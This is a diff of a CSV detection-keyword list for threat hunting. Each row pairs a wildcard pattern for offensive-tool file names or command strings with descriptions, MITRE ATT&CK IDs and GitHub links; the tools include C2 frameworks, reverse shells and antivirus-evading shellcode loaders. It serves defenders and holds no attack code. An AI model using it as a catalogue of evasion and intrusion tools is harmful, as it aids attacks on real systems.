+"*ShellCmd sc qc *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
 "*SHELLCODE GENERATOR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
-"*shellcode inject *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*shellcode inject *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*Shellcode Injected Successfully*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
-"*shellcode spawn *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
-"*shellcode*shellcode.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*shellcode spawn *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*shellcode*shellcode.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
 "*shellcode.asm*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z"
-"*Shellcode.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*Shellcode.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*shellcode_dll.dll*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","","N/A","","",""
 "*shellcode_dll\*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","","N/A","","",""
 "*shellcode_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*shellcode_dropper.c*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z"
 "*shellcode_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*Shellcode_encryption.exe*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z"
-"*shellcode_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
-"*shellcode_generator.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
-"*shellcode_generator_help.html*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
-"*shellcode_inject.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
-"*shellcode_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*shellcode_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*shellcode_generator.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
+"*shellcode_generator_help.html*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
+"*shellcode_inject.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. 
You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*shellcode_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ShellCode_Loader.py*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*shellcode1 += b*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*shellcode20.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" 
@@ -16836,16 +17019,16 @@
 "*Shellcode-Downloader-CreateThread-Execution*","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","229","49","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z"
 "*shellcodeEncryptDecrypt*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
 "*shellcode-exec.ps1*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","","N/A","","",""
-"*shellcodeexec.x32*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
-"*shellcodeexec.x64*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*shellcodeexec.x32*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*shellcodeexec.x64*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
 "*ShellcodeFluctuation.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
 "*ShellcodeFluctuation64*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
 "*ShellcodeFluctuation86*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
